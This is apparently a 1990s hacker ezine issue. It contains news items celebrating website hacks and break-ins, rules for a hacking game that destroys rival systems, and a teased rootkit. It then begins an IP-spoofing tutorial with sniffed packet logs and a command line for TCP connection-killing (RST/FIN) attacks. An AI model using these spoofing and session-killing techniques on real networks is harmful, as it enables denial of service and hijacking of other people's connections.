ML - Mali
MM - Burma - Myanma
MN - Mongolia - Mongol Uls
MO - Macau
MP - Northern Mariana Islands
MQ - Martinique (France)
MR - Mauritania - Muritaniyah
MS - Montserrat
MT - Malta
MU - Mauritius
MV - Maldives
MW - Malawi
MY - Malaysia
MZ - Mozambique - Mocambique
NA - Namibia
NC - New Caledonia - Nouvelle-Caledonie
NE - Niger
NF - Norfolk Island (Australia)
NG - Nigeria
NI - Nicaragua
NL - Netherlands - Nederland
NO - Norway - Norge
NP - Nepal
NR - Nauru
NU - Niue
NZ - New Zealand
OM - Oman - Uman
PA - Panama
PE - Peru
PF - French Polynesia - Polynesie Francaise
PG - Papua New Guinea
PH - Philippines - Pilipinas
PK - Pakistan
PL - Poland - Polska
PM - Saint-Pierre et Miquelon
PN - Pitcairn Islands
PR - Puerto Rico
PT - Portugal
PW - Palau - Belau
PY - Paraguay
QA - Qatar
RE - Reunion
RO - Romania
RU - Russia - Rossiya
RW - Rwanda
SA - Saudi Arabia - Arabiya as Suudiyah
SB - Solomon Islands
SC - Seychelles
SD - Sudan
SE - Sweden - Sverige
SG - Singapore - Singapura
SH - Saint Helena (UK)
SI - Slovenia - Slovenija
SJ - Svalbard og Jan Mayen
SK - Slovakia - Slovensko
SL - Sierra Leone
SM - San Marino
SN - Senegal
SO - Somalia
SR - Suriname
ST - Sao Tome e Principe
SU - Soviet Union - Sovietskiy Soyuz
SV - El Salvador
SY - Syria - Suriyah
SZ - Swaziland
TC - Turks and Caicos Islands
TD - Chad - Tchad
TF - Southern and Antarctic Lands - Terre Australes et Antarctiques
TG - Togo
TH - Thailand
TJ - Tajikistan - Tojikiston
TK - Tokelau (New Zealand)
TM - Turkmenistan - Tiurkmenostan
TN - Tunisia - Tunis
TO - Tonga
TP - Timor
TR - Turkey - Turkiye
TT - Trinidad and Tobago
TV - Tuvalu
TW - Taiwan - T'ai-wan
TZ - Tanzania
UA - Ukraine - Ukrayina
UG - Uganda
UM - United States Minor Outlying Islands
US - United States of America
UY - Uruguay
UZ - Uzbekistan - Uzbekiston
VA - Holy See
VC - Saint Vincent and the Grenadines
VE - Venezuela
VG - Virgin Islands (UK)
VI - Virgin Islands (USA)
VN - Vietnam - Viet Nam
VU - Vanuatu
WF - Wallis et Futuna
WS - Samoa
YD - Yemen
YE - Yemen
YT - Mayotte (France)
YU - Yugoslavia
ZA - South Africa
ZM - Zambia
ZR - Zaire
ZW - Zimbabwe
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. CoreWars : so1o / od|phreak
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
od|phreak was telling me about an idea he had, then called just "Hacker Wars"
it was about teams, or groups of hackers who had a league system and hacked
each others systems to gain points...
We both made sets of rules and decided on a name also, CoreWars...Here are the
rules as to date :
- 6 hackers per team.
- Each team has 2 systems.
- The systems must run linux, and be up 24/7.
- The game is played from a friday at
midnight to a sunday at midnight (48 hours).
- On systems owned by the team, each user may have one
account, with any systems priveleges.
- Each team has 1 account on each enemy system
- 2.5mb quota per account
- must be a normal user
Rules :
-------
- super users on opposing teams are NOT allowed to
intervine with other hackers, this includes killing,
writing to their terminals, or disturbing them in
any way shape or form, however, super users are
allowed to use snoop and other programs to monitor
opposing team members, but they cannot DIRECTLY
step in and kill the user. super users CANNOT delete
files created by the opposing team members, however
they ARE allowed to delete files if they have been
MODIFIED, like /etc/motd.
- teams conquer a system by forcing it to be shut down,
switched off, or any other measure that prevents
persons from connecting or using that system. This
can include rm'ng the hard drive or any other suitable
measure.
The Winning Team Is The Last Team With A System That
Has Not Been Shut Down.
if you shut a system down : 100 points
if your system gets shut down : -50 points
if you keep both of your systems up : 25 points
if you lose both of your systems : -25 points
On Sunday midnight, all points are worked out, and
the league positions are calculated.
These Rules Are Currently Being Changed : http://www.neonunix.org/corewars/
Suggestions to myself or od|phreak...
So, if you have a team of 6 that you would like to enter in CoreWars, mail
corewars@<codezero's new domain that's not yet decided here> with your team
name, details, system IP and other relevant information...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Technophoria Want A Piece Of CodeZero Too? : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Technophoria, based at www.technophoria.com, did *NOT* hack our webpage at
www.neonunix.org/codezero/ as i dont even have a l/p to neonunix.org, anyway,
they uploaded this shiznit to the page, obviously with neonunix's account,
which is the only one on the system...
Dont talk shit about Technophoria<br><br><br>-Particle Man<br><Br>
<embed src="particle.wav"loop=true> <meta refresh="http://www.technophoria.com">
Hmmm, who the fuck is Particle Man?! last time I checked the Technophoria member
list it had...
Deprave
BroncBuster
Sludge
Acid Angel
Modify
The Messiah
Banshee
Now, I dont get on well with Modify or The Messiah (who are in like, 3 other
groups each) but Deprave is a good friend, Sludge and Acid I have never met
and Bronc is cool. I dont know whats goin down wit that shit, but the last
thing I need is some punk trying to say that I write shit about Technophoria,
seeing I have never written a thing about them, but anyway, if you do visit
the Technophoria WWW site, you will see that sIn and Technophoria are working
on the same project with the same people, Utopia (mentioned in the last issue
by *ODÝPHREAK*) I wonder who will take the credit and / or release the actual
program, hmm..I talked to The Messiah...
<TheMessiah> Utopia will be a encryption utility, release by
SIN/Technophoria, written by The Messiah and Fucking Hostile.
<TheMessiah> No release date is given.
<so1o> encryption util?
<so1o> for what purposes?
<TheMessiah> Encrypting files, clipboard, and an editor, like Puffer.
<so1o> thru windoze?
<TheMessiah> Yes.
<so1o> ahh
<TheMessiah> 16 bit.
<TheMessiah> With plans for a 32 bit version.
<so1o> because doesnt pgp do that and alot more?
<TheMessiah> No, it doesn't.
<so1o> what kind of encryption are we talking about?
<TheMessiah> PGP only uses ONE algorithm, IDEA.
<TheMessiah> About 16 different algorithms.
<so1o> and yours will use?
<TheMessiah> RC4, RC5, IDEA, Blowfish, DES, SuperIDEA...
<TheMessiah> I'm still looking into that...
<so1o> isnt that just ripping other peoples shit?
<so1o> blatently
<TheMessiah> No.
<TheMessiah> If so then PGP is ripping.
<TheMessiah> Puffer is ripping.
<TheMessiah> The source for almost all algorihtms is released.
<TheMessiah> So ppl can evaluate it..
<so1o> what about RC5 source then?
<TheMessiah> Have it.
<so1o> okay...
<so1o> so you have all your algorithms
<TheMessiah> RSA condones non-commercial use of RC4 and RC5.
<TheMessiah> Pretty much.
<so1o> but how will the program work then?
<TheMessiah> Right now I'm wondering which algorihtms to put into it.
<so1o> will it have secret keys and public keys like pgp
<so1o> ?
<TheMessiah> You select an algorihtm, files, and hit encrypt...
<TheMessiah> No, symetric key encryption.
<TheMessiah> One password...
<so1o> isnt that a bit unsecure?
<TheMessiah> I'm making a public key encryption program later on...
<TheMessiah> No, it isn't.
<so1o> seeing then the password will have to be given to the other user
<so1o> over a medium such as IRC
<TheMessiah> You can't transmit keys, true...
<so1o> which can be logged
<TheMessiah> But this isn't for communication as much as file storgae...
<TheMessiah> People can use PGP to transmit keys...
<so1o> so what will the program include?
<TheMessiah> Hmmm... what won't it?
<TheMessiah> I'm hoping to include some steganography in it...
<TheMessiah> It'll be something like Puffer, only WAY better...
<so1o> okzy
<so1o> 1st release will be 16-bit
<so1o> right?
<TheMessiah> Yes...
<so1o> will it have any problems running thru 95 / NT
<so1o> ?
<TheMessiah> Nope.
<TheMessiah> I'm using Win95...
<so1o> will users need .dll files to run it?
<TheMessiah> One.
<TheMessiah> But that'll come included...
<TheMessiah> No VB bullshit...
<TheMessiah> It's made in Delphi, so the runtime library is in the EXE...
<so1o> delphi
<so1o> i code borland c++
<TheMessiah> Get C++ Builder then...
<so1o> i plan on doing so
<TheMessiah> Like Delphi, but uses C++...
<so1o> okie, l8r
<TheMessiah> cya
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Global kOS News And Questions / Answers : Spidey
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
There have been several rumors circulating about what happened to us since
globalkos.org went down. They range from us being busted by feds to
stories about purple shrouds and phenobarbital. There have also been
rumors about dissention among our ranks and group infighting.
Q: What happened to globalkos.org? Did the feds shut it down? Did their
ISP shut it down? Did they move their site to keep it hidden?
A: Half of us didn't feel like paying for it. We weren't shut down, nor
is the site hidden out there somewhere. We're looking into alternatives.
Q: Did Acid Angel leave GkOS for Technophoria?
A: No. He is working with the guys at Technophoria, but he is still a part
of Global kOS.
Q: Did Silicon Toad leave the group altogether?
A: Somebody came up with this one on the basis of a broken link at
globalkos.org. ST moved his site, and no one bothered to update the link.
Through some stretch of logic this guy decided it meant ST split.
Q: What about Up Yours 4?
A: It's slated for release on March 30th.
Q: Did GkOS get busted?
A: No.
Q: I thought Cobra (Vortex, Morbid Disorder, Kludge, or Ryan) was a member of
GkOS.
A: I've never even heard of these people. They are not present, nor
former members.
Our members are:
Acid Angel
Glitch
Materva
Raven
Shadow Hunter
Silicon Toad
Spidey
That Guy
Zaven
Q: I heard there was a major disagreement within the group, and there's a
civil war going on between them. Is it true?
A: No. This is completely unfounded. Whoever started this one pulled it
straight out of his ass.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. www.ncaa.com Hack Makes News : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Conflict member TiK hacked www.ncaa.com, he made TV news, papers, and big
internet news, statements from the NCAA and other organisations can be found
on www.infowar.com, so1o never believed TiK would or could hack such a site
due to the high security levels, but good 'ole TiK proved us all wrong, expect
the index.html s00n!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. CodeZero To Release sunOS 5.x RootKit : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Yeah, werkin' on it, lewkout!!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. Too Many nethosting.com Break-Ins : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
www.hawkee.com and many other "vservers" at nethosting.com have been hacked
or attacked, like sinnerz.com (although no damage was done to the site) and
so the admin at nethosting can't be very happy with their security, I was
talking to hawkee about the hacks into his system by two members of the
CodeZero (thats what the numbers stood for - minus 2 from each, turn the 0
into a 26, then 1 = A, 2 = B, 3 = C etc. = CODEZERO) and he was saying that
newhosting had really boosted their secruity, this was also the case when
access to cough-syrup.nethosting.com was gained by one single hacker, as after
the attack, the sendmail version was pumped from 8.8.4 to 8.8.5, nethosting are
also considering taking action to prevent certain hosts from having access to
the system.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
7. sulfur of #hack to print a bi-monthly magazine : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Access Denied will be printed by sulfur (Edward Givings) of #hack, free copies
will be distributed at SummerCon, it will be bi-monthly, so you get 6 issues a
year, as opposed to 4 of 2600, look out for it...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8. 2600 printers go bust and take $9000 : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The latest news is that the 2600 printers have gone bust, and taken $9000 of
the 2600's money with them, Winter edition of 2600 might not come out.
emmilio can't be very happy can he?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.:. The CodeZero In Assosiation With Dr_Sp00f Presents .:.
.:. A Confidence Remains High Production .:.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-=[ A short (yea right - T_K) overview of IP spoofing: PART I ]=-
-=[ Part of Dr_sp00f's Packet Project']=-
(Includes Source for Linux 1.3.X and later kernels)
All text and Source code written by Dr_Sp00f himself (Copyright 1997)
All source tested on Linux kernel 2.0.X
All packet data captured with Sniffit 0.3.2 (a pre-release at that time)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
PART I: Simple spoofing (Non blind)
-----------------------------------
0. Introduction
0.1 What
0.2 For whom
0.3 Disclaimer
0.4 Licence
1. Short explanation of some words
2. Description of sourcecode
2.1 Source included
2.2 Programmer notes
3. TCP/IP (UDP) in an hazelnutshell
4. Non-blind spoofing
4.1 Know what you are doing
4.2 SYN flooding
4.3 Connection Killing
4.3.1 Using reset (RST)
4.3.2 Closing a connection (FIN)
4.3.3 Improving
4.4 Connection Hijacking
4.5 Other
5. The source code
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
PART I: Simple spoofing (Non blind)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
0. Introduction
---------------
0.1 What
--------
This document describes some IP spoofing attacks and gives you example
source code of the programs used for these attacks (and packet sniffer
logs, so you see what exactly happens).
It also provides you with an easy to use include file for experimenting a
little yourself.
Oh, if you make something nice with the "spoofit.h" file, please mail it to me
(or a reference where it is available) with a little explanation on what it
is (a few lines are enough)...
If you have interesting remarks, comment, idea's, ... please contact me
Dr_spoof@geocities.com
If YOU think of yourself, you are "3><Tr3/\/\3lY 3Le3T", please don't bother
contacting me.
Flames >/dev/null or >/dev/echo depends on how smart you are.
It is not wise to use what you don't know/understand, so read this before
trying anything... it will only take a few minutes, and probably save you
some hours of failure...
This code is not crippled in the usual way (removing some vital parts),
the power is limited by it's briefness, because I wanted to keep
everything simple and illustrative (but working). It's a simple job to
improve it, and that is the goal of this doc, that you improve it yourself.
Special thx to |ExcEEd| and theJUdgE also to all those ppl who deserve
it.
0.2 For whom
------------
For people with an elementary knowledge of TCP/IP, some knowledge on C (only
the basic setup) and some general UNIX knowledge.
It's no use reading this document if you are completely unaware of these
things, but mind you, only a little knowledge is enough.
0.3 Disclaimer
--------------
I am in no way responsible for the use of this code. By using this
software and reading this document you accept the fact that any damage
(emotional, physical, dataloss and the end of the world as we know it ...)
caused by the use or storage of these programs/documents is not MY
responsability.
I state that during the writing and testing of this document/source, I
never violated any law. All spoofing was done between machines where I had
legit root access, or where I had the permission from the legit root.
This code can be written by any competent programmer, so this source is
not so harmfull as some will say (cauz' I'm sure some people won't like
this degree of disclosure).
0.4 Licence
-----------
All source code and text is freely available. You can spread it, as long
as you don't charge for it (exceptions are a small reproduction fee, if
it isn't spread together with commercial software, texts.)
You may not spread parts of the document, it should be spread as one
package. You may not modify the text and/or source code.
You can use the spoofit.h or derived code in your own programs as long as
they are not commercial (i.e. FREE), and you give me the credits for it.
1. Short explanation of some words
----------------------------------
This is a short explanation of some words you might see in the
text/source. You probably know all this, but I put it in here anyway.
Sniffit
My favourite Packet Sniffer, all sniffed sequences in this
(At time of writing a pre-release 0.3.2)
IP-spoofing (further referenced to as spoofing)
The forging of IP packets
NOTE that not only IP based protocols are spoofed.
NOTE that spoofing is also used on a constructive base (LAN spoofing,
not discussed here).
NOTE that I don't use it on a constructive base ;)
Non-blind spoofing
Using the spoofing to interfer with a connection that sends packets
along your subnet (so generally one of the 2 hosts involved is located
on your subnet, or all data traffic has to be passing your network
device,... you might consider taking a job at some transatlantic route
provider).
Blind spoofing
Using the spoofing to interfer with a connection (or creating one),
that does not send packets along your cable.
2. Description of sourcecode
----------------------------
2.1 Source included
-------------------
spoofit.h
The include file that provides some easy to use spoofing functions.
To understand the include file and it's functions, read the header of
that file for use of the C functions.
*.c
Example programs (on the use of spoofit.h) that are discussed in this
document.
Details on these programs are included in the appropriate sections.
sniper-rst.c
Basic TCP connection killer.
(denial-of-services)
sniper-fin.c
Basic TCP connection killer.
(denial-of-services)
hijack.c
Simple automated telnet connection hijacker.
2.2 Programmer notes
--------------------
These programs are just examples. That means, they could be improved a
lot. Because I wanted to keep them short and leave some stuff to your
imagination, they are very simple.
However they all work and are a good starting point.
3. TCP/IP (UDP) in an hazelnutshell
-----------------------------------
Because it has been explained enough in 'Phrack Volume Seven, Issue
Forty-Eight, File 14 of 18' by daemon9/route/infinity , and there is a lot of
documentation available on the subject I will only repeat some things
very briefly. (Please read the phrack #48 file or any other document on
the subject before reading this).
A connection is fully defined with 4 parameters, a source host and port,
and a destination host and port.
When you make a connection, data is send in packets. Packets take care of
low level trafic, and make sure the data arrives (sometimes with special
error handling). The spine of most networks is the IP protocol version 4.
It is totally independent of all hardware protocols.
TCP and UDP are higher level protocols wrapped up in IP packets.
All those packets consist of a header and data.
IP header contains (amongst other things): IP of source and destination
hosts for that packet, and the protocol type of the packet wrapped up in
it. (TCP=6, UDP=17, etc.).
UDP packets contain (amongst other things): port number of source and
destination host. UDP has no such thing as SEQ/ACK, it is a very weak
protocol.
TCP packets contain (amongst other things): port number of source and
destination host, sequence and acknowledge numbers (further refered to as
SEQ/ACK), and a bunch of flags.
SEQ number: is counted byte per byte, and gives you the number of the
NEXT byte to be send, or that is send in this packet.
ACK number: is the SEQ number that is expected from the other host.
SEQ numbers are chosen at connection initiation.
I said is was going to be short... If you didn't understand the above
text, read up on it first, because you won't understand sh!t of the rest.
4. Non-blind spoofing
---------------------
4.1 Know what you are doing
---------------------------
The concept of non-blind spoofing (NBS further in this doc) is pretty
simple. Because packets travel within your reach, you can get the current
sequence and acknowledge (SEQ/ACK further in this doc) numbers on the
connection.
NBS is thus a very easy and accurate method of attack, but limited to
connections going over your subnet.
In spoofing documentation these attacks are sometimes ommited, because
they are mostly 'denial-of-service' attacks, or because people don't
realise the advantage a spoof (in particulary a hijack) can have above
simple password sniffing.
Spoofing in generally is refered to as a verry high level of attack. This
refers to blind spoofing (BlS further in this doc), because NBS is
kidstuff for a competent coder.
4.2 SYN flooding
----------------
Thoroughly discussed in 'Phrack Volume Seven, Issue Forty-Eight, File 13 of
18'. I won't waste much time on it.
Setup:
host A <-----][----------X--------------->host B
|
host S <-----------------/
Concept:
Host S impersonates SYN (connection init) coming from host A, to host B.
Host A should be unreachable (e.g. turned off, non existant,...).
B sends out the second packet of the 3 way TCP handshake. Host B will now
wait for response of host A.
If host A is reachable it will tell host B (with a reset: RST) that it DID NOT
inititate a connection, and thus host B received a bogus packet. (In that case
host B will ingnore the SYN, and *normally* nothing will happen)
So if A is unreachable, B will wait for response some time.
When doing multiple attacks, the backlog of host B is going to be exceeded
and host B will not except new connections (read on TCP bugs for
additional features ;) for some time.
4.3 Connection Killing
----------------------
Setup:
host A <------X------------------------->host B
| A,B have a TCP connection running
host S <------/ A,S on same subnet
(setup is the same in both cases)
Use:
Clearing mudders of your net, annoying that dude typing an important
paper, etc... plain fun.
4.3.1 Using reset (RST)
-----------------------
Concept:
TCP packets have flags which indicate the status of the packet, like RST.
That is a flag used to reset a connection. To be accepted, only the
sequence number has to be correct (there is no ACK in a RST packet).
So we are going to wait for packets in a connection between A and B.
Assume we wait for packets to A. We will calculate (from B's packets)
the sequence number for A's packets (from B's ACK's), and fire a bogus RST
packet from S (faking to be A) to B.
An actual attack:
(These are real sniffed packets, although IP numbers of hosts were changed)
host A : 166.66.66.1
host B : 111.11.11.11
(S on same subnet as A)
(This is a good example of how things not always go as you want, see
below for a solution)
1) connection running...
we wait for a packet to get current SEQ/ACK (A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
SEQ (hex): 57E1F2A6 ACK (hex): B8BD7679
FLAGS: -AP--- Window: 3400
(data removed because irrelevant, 2 bytes data)
2) This is the ACK of it + included data (witch causes SEQ number to
change, and thus messing up our scheme, because this came very fast.)
(B->A)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
SEQ (hex): B8BD7679 ACK (hex): 57E1F2A8
FLAGS: -AP--- Window: 2238
(data removed because irrelevant, 2 bytes data)
3) ACK of it. (A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
SEQ (hex): 57E1F2A8 ACK (hex): B8BD767B
FLAGS: -A---- Window: 3400
(data removed because irrelevant)
4) further data (B->A)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
SEQ (hex): B8BD767B ACK (hex): 57E1F2A8
FLAGS: -AP--- Window: 2238
(data removed because irrelevant)
5) ACK of it (A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
SEQ (hex): 57E1F2A8 ACK (hex): B8BD7691
FLAGS: -A---- Window: 3400
6) Now we get 2 RST packets. How do you explain that? Well, the first reset
packet has been buffered somewhere on our system, because the ethernet
segment was busy when we wanted to send it. This is the 'unexpected
thing' I discussed above, here we are lucky, the data stream cooled down
so fast.
When it doesn't cool down so fast, we could miss our RST (or the
connection will be killed a little later then when we wanted), you'll see
some idea's on how to fix that problem.
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
SEQ (hex): B8BD7679 FLAGS: ---R--
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
SEQ (hex): B8BD7691 FLAGS: ---R--
(This was the packet that killed the connection)
Discussion of the program:
The discussion here is a bit weird , that is because 'sniper-rst.c' is
not designed to be an optimal killer, merly to be an example.
We have the problem of speed here. We miss some packets what causes those
resends. So we would design a better 'sniper' if we do the following:
- use blocking IO (not necessarilly, because the RST killer would
loose some of it's beauty (looping), this is dealt
with in the FIN killer example. Blocking is a
little faster when a lot of packets come after
each other.)
- multi-packet firing... fire more packets with incremented SEQ.
(this is commented in the source)
- waiting for a pure ACK packet (no data), because otherwise you
risk to much of getting mid transmission and not being fast enough.
(disadvantage is the 'waiting period' before the connection is
killed)
NOTE these examples were done on non-loaded networks, with non-loaded
servers, what makes it a worst case scenario for speed problems.
4.3.2 Closing a connection (FIN)
--------------------------------
Concept:
An other flag is FIN and says: "no more data from sender".
This flag is used when closing a connection down the normal legit way. So
if there was a way to make a packet that is accepted by one of the two
hosts, this host would believe the 'sender' didn't have any data left.
Following (real) packets would be ignored as they are considered bogus.
That's it, because we can sniff the current SEQ/ACK of the connection we
can pretend to be either host A or B, and provide the other host with
CORRECT packetinformation, and an evil FIN flag.
The beauty of it all is, that after a FIN is send the other host always
replies with one if it is accepted, so we have a way to verify our
killing, and can be 100% sure of success (if for some reason we missed a
SEQ or ACK, we can just resend).
RST killing is more popular and is prefered, but I've put this in as an
example, and I like it myself.
An actual attack:
(These are real sniffed packets, although IP numbers of hosts were changed)
host A : 166.66.66.1
host B : 111.11.11.11
(S on same subnet as A)
1) connection is running....
sniper is started on host S as 'sniper-fin 166.66.66.1 23 111.11.11.11 1072'
and waits for a packet to take action (we need to get SEQ/ACK)
(mind you switching host A and B would be the same, only S would be
impersonating A instead of B)
suddenly a packet arrives... (A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
SEQ (hex): 19C6B98B ACK (hex): 69C5473E
FLAGS: -AP--- Window: 3400
Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
45 E 00 . 00 . 2A * 30 0 5E ^ 40 @ 00 . 40 @ 06 . 5E ^ AD . 9D . C1 . 45 E 33 3
9D . C1 . 2B + 0D . 00 . 17 . 04 . 30 0 19 . C6 . B9 . 8B . 69 i C5 . 47 G 3E >
50 P 18 . 34 4 00 . 3A : 61 a 00 . 00 . 0D . 0A .
~~~~~~~~~ > 2 data bytes
2) sniper detected it, and sends a bogus packet. (S as B -> A)
We calculate our SEQ as: ACK of (A->B) packet
We calculate our ACK as: SEQ of (A->B) packet + datalength of that packet
(19C6B98B + 2 = 19C6B98D)
(so we tell A, we received the last packet, and will not transmit
further data)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23
SEQ (hex): 69C5473E ACK (hex): 19C6B98D
FLAGS: -A---F Window: 7C00
(data removed because irrelevant)
3) host A now says: 'okay, you end the session, so here is my last data'
(A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
SEQ (hex): 19C6B98D ACK (hex): 69C5473E
FLAGS: -AP--- Window: 3400
(data removed because irrelevant)
